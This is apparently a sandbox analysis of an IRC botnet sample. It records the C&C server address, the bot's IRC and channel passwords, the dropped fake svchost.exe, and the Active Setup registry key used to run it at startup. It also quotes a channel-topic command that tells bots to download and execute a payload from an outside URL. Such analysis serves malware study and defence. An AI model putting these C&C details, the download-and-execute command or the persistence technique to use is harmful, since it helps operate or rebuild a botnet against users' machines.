* Requested Host: net.anddos.co.uk
* Resulting Address: 94.23.153.223
* IRC Data
o User Name: zgtlat
o Host Name: “”
o Server Name:
o Real Name: zgtlat
o Password: dickybob
o Nick Name: ncrrpk
o Non RFC Conform: 1
+ Channel
# Name: #ohai3
# Password: trb123trb
+ Notice Message Deleted
# Value: :irc.goonet.net NOTICE AUTH :*** Looking up your hostname…
# Value: :irc.goonet.net NOTICE AUTH :*** Couldn’t resolve your hostname; using your IP address instead
chanel #usb for spreading mesages
# Transport Protocol: TCP
# Remote Address: 94.23.153.223
# Remote Port: 6667
# Protocol: IRC
PASS dickybob
Joins: ohobwi [qnxgvg@52F1439E.1B24B74B.5FCC8487.IP]
Quits: cwjlgw [nngsix@4AC25E0E.E3C4C12B.345AC400.IP] (Ping timeout)
Joins: Anddosd [Anddos@rox-16A140DD.cable.ubr01.blac.blueyonder.co.uk]
Joins: hhpsvr [nvombw@4AC25E0E.E3C4C12B.345AC400.IP]
Quits: cwsanv [kqnxeh@35D5518B.EFB4043E.560DCF0A.IP] (Ping timeout)
Invisible Users: 599
Channels: 21 channels formed
Clients: I have 612 clients and 0 servers
Local users: Current Local Users: 612 Max: 655
Global users: Current Global Users: 612 Max: 655
File System Modifications
The following files were created in the system:
# Filename(s) File Size File MD5
1 c:RECYCLERS-1-5-21-1482476501-1644491937-682003330-1013Desktop.ini 62 bytes 0x7457A5DF1FF47C957ACF1FA000D7D9AD
2 c:RECYCLERS-1-5-21-1482476501-1644491937-682003330-1013svchost.exe
[file and pathname of the sample #1] 143,360 bytes 0x167B0F3DF365BCB5B239197A3F49F485
The following directory was created:
c:RECYCLERS-1-5-21-1482476501-1644491937-682003330-1013
Registry Modifications
The following Registry Key was created:
HKEY_LOCAL_MACHINESOFTWAREMicrosoftActive SetupInstalled Components{28ABC5C0-4FCB-11CF-AAX5-81CX1C635612}
The newly created Registry Value is:
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftActive SetupInstalled Components{28ABC5C0-4FCB-11CF-AAX5-81CX1C635612}]
StubPath = “c:RECYCLERS-1-5-21-1482476501-1644491937-682003330-1013svchost.exe”
so that svchost.exe runs every time Windows starts
Host Name IP Address
net.anddos.co.uk 94.23.153.223
tigerden.uppit.com
tigerden.uppit.com 69.197.161.218
Download URLs
http://69.197.161.218/save/3112195e69e8f86fd20b9ef96c448284/4b10a730/0209/c0yoabou/ppi_2_.exe (tigerden.uppit.com)
* C&C Server: 94.23.153.223:6667
* Server Password:
* Username: erppma
* Nickname: ruxull
* Channel: #ohai3 (Password: trb123trb)
* Channeltopic: :.dl http://tigerden.uppit.com/save/3112195e69e8f86fd20b9ef96c448284/4b10a730/0209/c0yoabou/ppi_2_.exe c:p.exe 1
Outgoing connection to remote server: tigerden.uppit.com TCP port 80